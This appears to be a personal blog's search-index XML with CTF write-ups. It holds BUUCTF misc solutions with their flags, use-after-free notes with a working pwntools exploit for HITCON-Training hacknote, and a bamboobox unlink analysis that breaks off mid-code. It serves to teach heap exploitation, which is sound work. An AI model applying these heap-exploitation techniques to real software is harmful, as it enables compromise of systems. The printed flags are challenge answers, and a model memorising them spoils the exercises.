<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>BUUCTF Misc Practice Notes</title>
<link href="/2026/02/24/buuctf-misc-1/"/>
<url>/2026/02/24/buuctf-misc-1/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="你竟然赶我走">你竟然赶我走</h2><p><img src="/images/buuctf-misc-1/%E4%BD%A0%E7%AB%9F%E7%84%B6%E8%B5%B6%E6%88%91%E8%B5%B0.PNG" alt="你竟然赶我走.PNG"></p><div class="code-wrapper"><pre><code class="hljs text">flag{stego_is_s0_bor1ing}</code></pre></div><h2 id="大白">大白</h2><p>The file properties look abnormal, which suggests the image height has been modified.<br><img src="/images/buuctf-misc-1/dabai1.png" alt><br>010 Editor shows <code>00 00 02 A7</code> and <code>00 00 01 00</code>, the image width and height respectively. Set the height to the same value as the width:<br><img src="/images/buuctf-misc-1/dabai2.png" alt></p><h2 id="乌镇峰会种图">乌镇峰会种图</h2><p>Same approach as <code>你竟然赶我走</code>.</p><h2 id="n种方法解决">N种方法解决</h2><p>We get an exe. Opening it in VS Code shows one long blob:</p><p><img src="/images/buuctf-misc-1/n-way-1.png" alt></p><p>Open it in a browser:<br><img src="/images/buuctf-misc-1/n-way-2.png" alt><br>Scan it:<br>The resulting flag needs to be adjusted before submitting.</p><div class="code-wrapper"><pre><code class="hljs text">flag{dca57f966e4e4e31fd5b15417da63269}</code></pre></div><h2 id="基础破解">基础破解</h2><p>Brute-force the pseudo-random number,<br>then Base64-decode the result.</p><div class="code-wrapper"><pre><code class="hljs text">flag{70354300a5100ba78068805661b93a5c}</code></pre></div><h2 id="文件中的秘密">文件中的秘密</h2><p>Check the file properties.<br><img src="/images/buuctf-misc-1/file-secret.png" alt></p><h2 id="zip伪加密">zip伪加密</h2><p>The same pseudo-random-number brute force as above.</p><div class="code-wrapper"><pre><code class="hljs text">flag{Adm1N-B2G-kU-SZIP}</code></pre></div><h2 id="qr">qr</h2><p>Scanning the QR code yields some text that can be copied:</p><div class="code-wrapper"><pre><code class="hljs text">欢迎参加本次比赛,密码为 Flag{878865ce73370a4ce607d21ca01b5e59}</code></pre></div><h2 id="wireshark">wireshark</h2><div class="code-wrapper"><pre><code class="hljs text">A hacker used Wireshark to capture the traffic of an administrator logging in to a website (the administrator's password is the answer). Note: wrap the flag in flag{} when submitting.</code></pre></div><p>Following the hint, filter for POST packets directly:</p><div class="code-wrapper"><pre><code class="hljs text">http.request.method==POST</code></pre></div><p><img src="/images/buuctf-misc-1/wireshark.png" alt></p><div 
class="code-wrapper"><pre><code class="hljs text">flag{ffb7567a1d4f4abdffdb54e022f8facd}</code></pre></div><h2 id="被嗅探的流量">被嗅探的流量</h2><p>First filter for the usual POST traffic. One of the entries contains the string flag, so follow that stream:<br><img src="/images/buuctf-misc-1/%E8%A2%AB%E5%97%85%E6%8E%A2%E7%9A%84%E6%B5%81%E9%87%8F.png" alt></p><div class="code-wrapper"><pre><code class="hljs text">flag{da73d88936010da1eeeb36e945ec4b97}</code></pre></div>]]></content>
<categories>
<category> Misc </category>
</categories>
<tags>
<tag> BUUCTF </tag>
<tag> CTF </tag>
<tag> Misc </tag>
</tags>
</entry>
<entry>
<title>UAF Study Notes</title>
<link href="/2026/02/20/use-after-free-learning/"/>
<url>/2026/02/20/use-after-free-learning/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="原理">Principle</h2><p><code>Use After Free</code> means exactly what it says: a memory block is used again after it has been freed. In practice there are several cases:</p><ul><li>After the block is freed, its pointer is set to NULL and then used again; the program naturally crashes.</li><li>After the block is freed, its pointer is not set to NULL, and no code modifies the block before its next use; in that case <strong>the program is quite likely to keep running normally</strong>.</li><li>After the block is freed, its pointer is not set to NULL, but some code modifies the block before its next use; when the program uses the block again, <strong>strange problems are quite likely to appear</strong>.</li></ul><blockquote><p>Use After Free vulnerabilities usually refer to the latter two cases. A pointer that is not set to NULL after its memory is freed is called a <strong>dangling pointer</strong>.</p></blockquote><h2 id="案例分析">Case study</h2><blockquote><p>This code can be run on Ubuntu 16.</p></blockquote><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">name</span> {</span> <span class="hljs-type">char</span> *myname; <span class="hljs-type">void</span> (*func)(<span class="hljs-type">char</span> *str);} NAME;<span class="hljs-type">void</span> <span class="hljs-title function_">myprint</span><span class="hljs-params">(<span class="hljs-type">char</span> *str)</span> { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s\n"</span>, str); }<span class="hljs-type">void</span> <span class="hljs-title function_">printmyname</span><span class="hljs-params">()</span> { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"call print my name\n"</span>); }<span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> { NAME *a; a = (NAME *)<span 
class="hljs-built_in">malloc</span>(<span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">struct</span> name)); a->func = myprint; a->myname = <span class="hljs-string">"I can also use it"</span>; a->func(<span class="hljs-string">"this is my function"</span>); <span class="hljs-comment">// free without modify</span> <span class="hljs-built_in">free</span>(a); a->func(<span class="hljs-string">"I can also use it"</span>); <span class="hljs-comment">// free with modify</span> a->func = printmyname; a->func(<span class="hljs-string">"this is my function"</span>); <span class="hljs-comment">// set NULL</span> a = <span class="hljs-literal">NULL</span>; <span class="hljs-built_in">printf</span>(<span class="hljs-string">"this program will crash...\n"</span>); a->func(<span class="hljs-string">"can not be printed..."</span>);}</code></pre></div><p>Running it shows that although a has been freed, the function myprint reached through a can still be called, and the pointer can even be changed to call printmyname. A segmentation fault occurs only after a is set to NULL.</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-built_in">free</span>(a);a->func(<span class="hljs-string">"I can also use it"</span>);<span class="hljs-comment">// free with modify</span>a->func = printmyname;a->func(<span class="hljs-string">"this is my function"</span>);</code></pre></div><p>myprint() can still be called and prints its string successfully. The next step goes beyond calling the function: the function pointer stored in the func member is changed to printmyname(), and func is called again. printmyname() takes no parameters, but the call still goes through a pointer declared as <code>void (*)(char *)</code>, so the argument "this is my function" is passed anyway and simply ignored. Even with the function pointer changed, printmyname() runs without trouble and prints “call print my name”.</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">// set NULL</span>a = <span class="hljs-literal">NULL</span>;<span class="hljs-built_in">printf</span>(<span class="hljs-string">"this program will crash...\n"</span>);a->func(<span class="hljs-string">"can not be 
printed..."</span>);</code></pre></div><p>Next, a is set to NULL and a notice string is printed. When the program calls func once more, only the notice appears; printmyname() is not executed through func. This example shows quite directly why a struct pointer should be set to NULL after it is freed, and what becomes possible when it is not.</p><h2 id="例题:-hitcon-training-hacknote">Example: <a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/linux/user-mode/heap/use_after_free/hitcon-training-hacknote">HITCON-Training-hacknote</a></h2><h3 id="程序分析">Program analysis</h3><h4 id="检查保护">Checking protections</h4><div class="code-wrapper"><pre><code class="hljs bash">zer0ptr@DESKTOP-65QJLFA:~/Pwn/UAF$ checksec hacknote[*] <span class="hljs-string">'/home/zer0ptr/Pwn/UAF/hacknote'</span> Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) Stripped: No</code></pre></div><h4 id="静态分析">Static analysis</h4><p><img src="/images/uaf-hitcon-lab10/magic.png" alt></p><p>There is a magic function here; worth remembering, since it will probably be useful.</p><h5 id="add-note">add_note()</h5><p>From the program we can see that at most 5 notes can be added. Each note has two fields, <code>void (*printnote)();</code> and <code>char *content;</code>. <code>printnote</code> is set to a function that prints what <code>content</code> points to (the decompiled code names this field <code>put</code>).</p><p>The note struct is defined as follows:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">note</span> {</span> <span class="hljs-type">void</span> (*printnote)(); <span class="hljs-type">char</span> *content;};</code></pre></div><p>The code of add_note is as follows:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> <span class="hljs-title function_">add_note</span><span class="hljs-params">()</span>{ note *v0; <span class="hljs-comment">// ebx</span> <span class="hljs-type">signed</span> <span class="hljs-type">int</span> i; <span class="hljs-comment">// [esp+Ch] [ebp-1Ch]</span> <span class="hljs-type">int</span> size; <span class="hljs-comment">// [esp+10h] [ebp-18h]</span> <span class="hljs-type">char</span> buf; <span class="hljs-comment">// [esp+14h] [ebp-14h]</span> <span 
class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v5; <span class="hljs-comment">// [esp+1Ch] [ebp-Ch]</span> v5 = __readgsdword(<span class="hljs-number">0x14u</span>); <span class="hljs-keyword">if</span> ( count <= <span class="hljs-number">5</span> ) { <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i <= <span class="hljs-number">4</span>; ++i ) { <span class="hljs-keyword">if</span> ( !notelist[i] ) { notelist[i] = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">8u</span>); <span class="hljs-keyword">if</span> ( !notelist[i] ) { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Alloca Error"</span>); <span class="hljs-built_in">exit</span>(<span class="hljs-number">-1</span>); } notelist[i]->put = print_note_content; <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Note size :"</span>); read(<span class="hljs-number">0</span>, &buf, <span class="hljs-number">8u</span>); size = atoi(&buf); v0 = notelist[i]; v0->content = <span class="hljs-built_in">malloc</span>(size); <span class="hljs-keyword">if</span> ( !notelist[i]->content ) { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Alloca Error"</span>); <span class="hljs-built_in">exit</span>(<span class="hljs-number">-1</span>); } <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Content :"</span>); read(<span class="hljs-number">0</span>, notelist[i]->content, size); <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Success !"</span>); ++count; <span class="hljs-keyword">return</span> __readgsdword(<span class="hljs-number">0x14u</span>) ^ v5; } } } <span class="hljs-keyword">else</span> { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Full"</span>); } <span class="hljs-keyword">return</span> __readgsdword(<span class="hljs-number">0x14u</span>) ^ 
v5;}</code></pre></div><p>If notelist[i] is NULL, an 8-byte chunk is allocated for it. After the allocation, another if check verifies that it succeeded, and then the print_note_content() function pointer is stored in the chunk.</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">int</span> __cdecl <span class="hljs-title function_">print_note_content</span><span class="hljs-params">(<span class="hljs-type">int</span> a1)</span>{ <span class="hljs-keyword">return</span> <span class="hljs-built_in">puts</span>(*(<span class="hljs-type">const</span> <span class="hljs-type">char</span> **)(a1 + <span class="hljs-number">4</span>));}</code></pre></div><p>print_note_content() prints the string whose pointer is stored at a1 + 4. add_note then reads the size into buf, converts it with atoi and assigns it to size, and stores a malloc'd buffer of size bytes at v0 + 4.</p><blockquote><p>The program calls read to place the input at <code>*((void **)*(&notelist + i) + 1)</code>; no overflow is possible here.</p></blockquote><h5 id="print-note">print_note()</h5><p>print_note simply prints the content of the note at the given index:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> <span class="hljs-title function_">print_note</span><span class="hljs-params">()</span>{ <span class="hljs-type">int</span> v1; <span class="hljs-comment">// [esp+4h] [ebp-14h]</span> <span class="hljs-type">char</span> buf; <span class="hljs-comment">// [esp+8h] [ebp-10h]</span> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v3; <span class="hljs-comment">// [esp+Ch] [ebp-Ch]</span> v3 = __readgsdword(<span class="hljs-number">0x14u</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Index :"</span>); read(<span class="hljs-number">0</span>, &buf, <span class="hljs-number">4u</span>); v1 = atoi(&buf); <span class="hljs-keyword">if</span> ( v1 < <span class="hljs-number">0</span> || v1 >= count ) { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Out of bound!"</span>); _exit(<span class="hljs-number">0</span>); } <span class="hljs-keyword">if</span> ( notelist[v1] ) notelist[v1]->put(notelist[v1]); <span 
class="hljs-keyword">return</span> __readgsdword(<span class="hljs-number">0x14u</span>) ^ v3;}</code></pre></div><h5 id="delete-note">delete_note</h5><p>delete_note frees the note at the given index. Note, however, that deletion only calls free and never sets the pointer to NULL, so a Use After Free is clearly possible here.</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> <span class="hljs-title function_">del_note</span><span class="hljs-params">()</span>{ <span class="hljs-type">int</span> v1; <span class="hljs-comment">// [esp+4h] [ebp-14h]</span> <span class="hljs-type">char</span> buf; <span class="hljs-comment">// [esp+8h] [ebp-10h]</span> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v3; <span class="hljs-comment">// [esp+Ch] [ebp-Ch]</span> v3 = __readgsdword(<span class="hljs-number">0x14u</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Index :"</span>); read(<span class="hljs-number">0</span>, &buf, <span class="hljs-number">4u</span>); v1 = atoi(&buf); <span class="hljs-keyword">if</span> ( v1 < <span class="hljs-number">0</span> || v1 >= count ) { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Out of bound!"</span>); _exit(<span class="hljs-number">0</span>); } <span class="hljs-keyword">if</span> ( notelist[v1] ) { <span class="hljs-built_in">free</span>(notelist[v1]->content); <span class="hljs-built_in">free</span>(notelist[v1]); <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Success"</span>); } <span class="hljs-keyword">return</span> __readgsdword(<span class="hljs-number">0x14u</span>) ^ v3;}</code></pre></div><ol><li><p>The chunk at <code>notelist+v1+1</code> (the content) is freed first.</p></li><li><p>Then the chunk at <code>notelist+v1</code> (the note itself) is freed.</p></li><li><p>Neither chunk pointer is set to NULL after the two chunks are freed.</p></li></ol><h4 id="动态调试">Dynamic debugging</h4><p><a href="https://www.bilibili.com/video/BV1L8411m7xW/?spm_id_from=333.337.search-card.all.click&vd_source=302a892bb778bc77294aa18fcca329b7">l140w4n9 - 
Linux堆溢出Use After Free</a></p><blockquote><p>Too lazy for now; to be filled in later.</p></blockquote><h4 id="利用姿势">Exploitation approach</h4><blockquote><p>Use the use after free to make the program execute the magic function: <strong>a very direct idea is to overwrite a note's <code>printnote</code> field with the address of magic, so that magic runs whenever <code>printnote</code> is invoked</strong></p></blockquote><p>Let's see how to achieve this. Each add_note call performs two allocations:</p><ol><li>The program allocates 8 bytes to hold the note's printnote and content pointers.</li><li>The program allocates memory of the size given as input and uses it to store the content.</li></ol><p><img src="/images/uaf-hitcon-lab10/uaf_exp.png" alt></p><h5 id="details">Details</h5><ul><li>Allocate note0 with a real content size of 16 (any size that lands in a different bin than the note struct itself will do)</li><li>Allocate note1 with a real content size of 16 (any size that lands in a different bin than the note struct itself will do)</li><li>Free note0</li><li>Free note1</li><li>At this point, the fast bin for chunks of size 16 holds the list <code>note1->note0</code></li><li>Allocate note2 with a real content size of 8. By the heap allocation rules, note2 is given the memory block that belonged to note1 (we freed note0 first and note1 second, so note1 is at the tail of the list; a fast bin is last in, first out and operates directly on the tail)</li><li>So the chunk used for note2's real content is actually note0</li><li>If we now write the address of magic into note2's real content chunk, then, because note0's pointer was never set to NULL, printing note0 again makes the program call the magic function</li></ul><h4 id="exp">EXP</h4><div class="code-wrapper"><pre><code class="hljs python"><span class="hljs-comment"># -*- coding: utf-8 -*-</span><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *r = process(<span class="hljs-string">'./hacknote'</span>)<span class="hljs-keyword">def</span> <span class="hljs-title function_">addnote</span>(<span class="hljs-params">size, content</span>): r.recvuntil(<span class="hljs-string">b":"</span>) r.sendline(<span class="hljs-string">b"1"</span>) r.recvuntil(<span class="hljs-string">b":"</span>) r.sendline(<span class="hljs-built_in">str</span>(size).encode()) r.recvuntil(<span class="hljs-string">b":"</span>) r.sendline(content)<span class="hljs-keyword">def</span> <span class="hljs-title function_">delnote</span>(<span class="hljs-params">idx</span>): r.recvuntil(<span class="hljs-string">b":"</span>) r.sendline(<span class="hljs-string">b"2"</span>) r.recvuntil(<span 
class="hljs-string">b":"</span>) r.sendline(<span class="hljs-built_in">str</span>(idx).encode())<span class="hljs-keyword">def</span> <span class="hljs-title function_">printnote</span>(<span class="hljs-params">idx</span>): r.recvuntil(<span class="hljs-string">b":"</span>) r.sendline(<span class="hljs-string">b"3"</span>) r.recvuntil(<span class="hljs-string">b":"</span>) r.sendline(<span class="hljs-built_in">str</span>(idx).encode())magic = <span class="hljs-number">0x08048986</span>addnote(<span class="hljs-number">16</span>, <span class="hljs-string">b"aaaa"</span>) <span class="hljs-comment"># add note 0</span>addnote(<span class="hljs-number">16</span>, <span class="hljs-string">b"ddaa"</span>) <span class="hljs-comment"># add note 1</span>delnote(<span class="hljs-number">0</span>) <span class="hljs-comment"># delete note 0</span>delnote(<span class="hljs-number">1</span>) <span class="hljs-comment"># delete note 1</span>addnote(<span class="hljs-number">8</span>, p32(magic)) <span class="hljs-comment"># add note 2</span>printnote(<span class="hljs-number">0</span>) <span class="hljs-comment"># print note 0</span>r.interactive()</code></pre></div><p><img src="/images/uaf-hitcon-lab10/getshell.png" alt></p><h2 id="references">References</h2><ul><li><p>CTF-Wiki</p><ul><li><a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/use-after-free/#_3">Use After Free</a></li></ul></li><li><p>CSDN</p><ul><li><a href="https://blog.csdn.net/qq_41202237/article/details/108797478">好好说话之Use After Free</a></li><li><a href="https://blog.csdn.net/m0_57836225/article/details/143894272">PWN -UAF(Use After Free)漏洞解析</a></li></ul></li><li><p>CNBLOGS</p><ul><li><a href="https://www.cnblogs.com/happynoy/p/16276285.html"> [BUUCTF]刷题记录:hitcontraining_uaf</a></li><li><a href="https://www.cnblogs.com/welkinchan/p/12212989.html">UAF——use after free</a></li></ul></li><li><p>Blogs</p><ul><li><a 
href="https://yufeiyu33.github.io/posts/41088.html">UAF漏洞(hitcontraining_uaf)</a></li><li><a href="https://yyyffff.github.io/2025/08/02/%E4%B8%80%E4%BA%9B%E9%A2%98%E7%9B%AE%E8%AE%B0%E5%BD%95/">一些题目记录 - HITCON-training lab 10 hacknote</a></li><li><a href="https://c1oudfl0w0.github.io/blog/2025/03/02/Use-After-Free/#%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90">Use After Free</a></li><li><a href="https://darkwing.moe/2019/06/25/Pwn%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B022-Use-After-Free/">Pwn学习笔记22:Use After Free</a></li><li><a href="https://tangzichengcc.github.io/pwn%E5%85%A5%E9%97%A8-15-%E5%A0%86%E5%88%A9%E7%94%A8%E4%B9%8BUse-After-Free/">pwn入门-15-堆利用之Use-After-Free</a></li></ul></li><li><p>先知</p><ul><li><a href="https://xz.aliyun.com/news/6742">Hitcon Traning Lab10做题笔记 —— UAF漏洞分析</a></li><li><a href="https://xz.aliyun.com/news/13928">堆利用Use After Free 详解</a></li><li><a href="https://binhack.readthedocs.io/zh/latest/heap/uaf.html"> 二进制安全学习笔记 - 11.1. Use After Free</a></li></ul></li><li><p>Bilibili</p><ul><li><a href="https://www.bilibili.com/video/BV1L8411m7xW/?spm_id_from=333.337.search-card.all.click&vd_source=302a892bb778bc77294aa18fcca329b7">Linux堆溢出Use After Free</a></li></ul></li></ul>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> Pwn </tag>
<tag> Heap </tag>
<tag> UAF </tag>
</tags>
</entry>
<entry>
<title>hitcon-training-unlink writeup</title>
<link href="/2026/02/14/hitcon-training-unlink/"/>
<url>/2026/02/14/hitcon-training-unlink/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="checksec">Checksec</h2><div class="code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment"># zer0ptr @ DESKTOP-FHEMUHT in ~/CTF-Pwn/heap/unlink/hitcontraining_unlink [15:14:56]</span>$ checksec bamboobox[*] <span class="hljs-string">'/home/zer0ptr/CTF-Pwn/heap/unlink/hitcontraining_unlink/bamboobox'</span> Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) Stripped: No</code></pre></div><p><strong>NO PIE</strong></p><h2 id="分析">Analysis</h2><h4 id="main函数">The main function</h4><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">int</span> __fastcall <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span>{ <span class="hljs-type">void</span> (**v4)(<span class="hljs-type">void</span>); <span class="hljs-comment">// [rsp+8h] [rbp-18h]</span> <span class="hljs-type">char</span> buf[<span class="hljs-number">8</span>]; <span class="hljs-comment">// [rsp+10h] [rbp-10h] BYREF</span> <span class="hljs-type">unsigned</span> __int64 v6; <span class="hljs-comment">// [rsp+18h] [rbp-8h]</span> v6 = __readfsqword(<span class="hljs-number">0x28u</span>); setvbuf(<span class="hljs-built_in">stdout</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>); setvbuf(<span class="hljs-built_in">stdin</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>, <span class="hljs-number">0</span>); v4 = (<span class="hljs-type">void</span> (**)(<span class="hljs-type">void</span>))<span 
class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10u</span>); *v4 = (<span class="hljs-type">void</span> (*)(<span class="hljs-type">void</span>))hello_message; v4[<span class="hljs-number">1</span>] = (<span class="hljs-type">void</span> (*)(<span class="hljs-type">void</span>))goodbye_message; (*v4)(); <span class="hljs-keyword">while</span> ( <span class="hljs-number">1</span> ) { menu(); read(<span class="hljs-number">0</span>, buf, <span class="hljs-number">8u</span>); <span class="hljs-keyword">switch</span> ( atoi(buf) ) { <span class="hljs-keyword">case</span> <span class="hljs-number">1</span>: show_item(); <span class="hljs-keyword">break</span>; <span class="hljs-keyword">case</span> <span class="hljs-number">2</span>: add_item(); <span class="hljs-keyword">break</span>; <span class="hljs-keyword">case</span> <span class="hljs-number">3</span>: change_item(); <span class="hljs-keyword">break</span>; <span class="hljs-keyword">case</span> <span class="hljs-number">4</span>: remove_item(); <span class="hljs-keyword">break</span>; <span class="hljs-keyword">case</span> <span class="hljs-number">5</span>: v4[<span class="hljs-number">1</span>](); <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>); <span class="hljs-keyword">default</span>: <span class="hljs-built_in">puts</span>(<span class="hljs-string">"invaild choice!!!"</span>); <span class="hljs-keyword">break</span>; } }}</code></pre></div><p>Decompiling main in IDA makes each feature clear at a glance. Note that every choice entered is converted to an integer with atoi(); this is one of the keys to the exploit.</p><p>show_item:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">int</span> <span class="hljs-title function_">show_item</span><span class="hljs-params">()</span>{ <span class="hljs-type">int</span> i; <span class="hljs-comment">// [rsp+Ch] [rbp-4h]</span> <span class="hljs-keyword">if</span> ( !num ) <span class="hljs-keyword">return</span> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"No item in the 
box"</span>); <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i <= <span class="hljs-number">99</span>; ++i ) { <span class="hljs-keyword">if</span> ( *((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * i) ) <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%d : %s"</span>, i, *((<span class="hljs-type">const</span> <span class="hljs-type">char</span> **)&unk_6020C8 + <span class="hljs-number">2</span> * i)); } <span class="hljs-keyword">return</span> <span class="hljs-built_in">puts</span>(byte_401089);}</code></pre></div><ol><li>There is an off-by-one here, but challenges that focus on unlink generally do not use it.</li><li><code>&unk_6020c8</code> is in the bss section and is the base address of the items.</li></ol><p>add_item:</p><div class="code-wrapper"><pre><code class="hljs c">__int64 <span class="hljs-title function_">add_item</span><span class="hljs-params">()</span>{ <span class="hljs-type">int</span> i; <span class="hljs-comment">// [rsp+4h] [rbp-1Ch]</span> <span class="hljs-type">int</span> v2; <span class="hljs-comment">// [rsp+8h] [rbp-18h]</span> <span class="hljs-type">char</span> buf[<span class="hljs-number">8</span>]; <span class="hljs-comment">// [rsp+10h] [rbp-10h] BYREF</span> <span class="hljs-type">unsigned</span> __int64 v4; <span class="hljs-comment">// [rsp+18h] [rbp-8h]</span> v4 = __readfsqword(<span class="hljs-number">0x28u</span>); <span class="hljs-keyword">if</span> ( num > <span class="hljs-number">99</span> ) { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"the box is full"</span>); } <span class="hljs-keyword">else</span> { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Please enter the length of item name:"</span>); read(<span class="hljs-number">0</span>, buf, <span class="hljs-number">8u</span>); v2 = atoi(buf); <span class="hljs-keyword">if</span> ( !v2 ) { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"invaild length"</span>); <span class="hljs-keyword">return</span> <span 
class="hljs-number">0</span>; } <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i <= <span class="hljs-number">99</span>; ++i ) { <span class="hljs-keyword">if</span> ( !*((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * i) ) { *((_DWORD *)&itemlist + <span class="hljs-number">4</span> * i) = v2; *((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * i) = <span class="hljs-built_in">malloc</span>(v2); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Please enter the name of item:"</span>); *(_BYTE *)(*((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * i) + (<span class="hljs-type">int</span>)read(<span class="hljs-number">0</span>, *((<span class="hljs-type">void</span> **)&unk_6020C8 + <span class="hljs-number">2</span> * i), v2)) = <span class="hljs-number">0</span>; ++num; <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>; } } } <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;}</code></pre></div><p>In add_item, a length v2 is entered first, then the slots in bss (base address 0x6020c8) are scanned. If a free slot exists, a chunk of size v2 is allocated (the size here excludes the chunk header) and its address is written to bss. A string is then read, and at most its first v2 bytes are written into the chunk as the item name. The read call on line 30 returns the number of bytes actually read; adding that to the base address of the string gives the end of the string, where a 0 byte is written to terminate it.</p><p>change_item:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">unsigned</span> __int64 <span class="hljs-title function_">change_item</span><span class="hljs-params">()</span>{ <span class="hljs-type">int</span> v1; <span class="hljs-comment">// [rsp+4h] [rbp-2Ch]</span> <span class="hljs-type">int</span> v2; <span class="hljs-comment">// [rsp+8h] [rbp-28h]</span> <span class="hljs-type">char</span> buf[<span class="hljs-number">16</span>]; <span class="hljs-comment">// [rsp+10h] [rbp-20h] BYREF</span> <span class="hljs-type">char</span> nptr[<span class="hljs-number">8</span>]; <span class="hljs-comment">// [rsp+20h] [rbp-10h] BYREF</span> <span class="hljs-type">unsigned</span> __int64 v5; <span 
class="hljs-comment">// [rsp+28h] [rbp-8h]</span> v5 = __readfsqword(<span class="hljs-number">0x28u</span>); <span class="hljs-keyword">if</span> ( num ) { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Please enter the index of item:"</span>); read(<span class="hljs-number">0</span>, buf, <span class="hljs-number">8u</span>); v1 = atoi(buf); <span class="hljs-keyword">if</span> ( *((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * v1) ) { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Please enter the length of item name:"</span>); read(<span class="hljs-number">0</span>, nptr, <span class="hljs-number">8u</span>); v2 = atoi(nptr); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Please enter the new name of the item:"</span>); *(_BYTE *)(*((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * v1) + (<span class="hljs-type">int</span>)read(<span class="hljs-number">0</span>, *((<span class="hljs-type">void</span> **)&unk_6020C8 + <span class="hljs-number">2</span> * v1), v2)) = <span class="hljs-number">0</span>; } <span class="hljs-keyword">else</span> { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"invaild index"</span>); } } <span class="hljs-keyword">else</span> { <span class="hljs-built_in">puts</span>(<span class="hljs-string">"No item in the box"</span>); } <span class="hljs-keyword">return</span> __readfsqword(<span class="hljs-number">0x28u</span>) ^ v5;}</code></pre></div><p>change_item renames the item with index v1, using exactly the same method as add_item. This is also where the heap overflow lies: the length we enter is not checked against the chunk's size, so a length larger than the chunk lets us overflow into other chunks.</p><p>remove_item:</p><div class="code-wrapper"><pre><code class="hljs bash">unsigned __int64 <span class="hljs-function"><span class="hljs-title">remove_item</span></span>(){ int v1; // [rsp+Ch] [rbp-14h] char buf[8]; // [rsp+10h] [rbp-10h] BYREF unsigned __int64 v3; // [rsp+18h] [rbp-8h] v3 = __readfsqword(0x28u); <span class="hljs-keyword">if</span> ( num ) { <span 
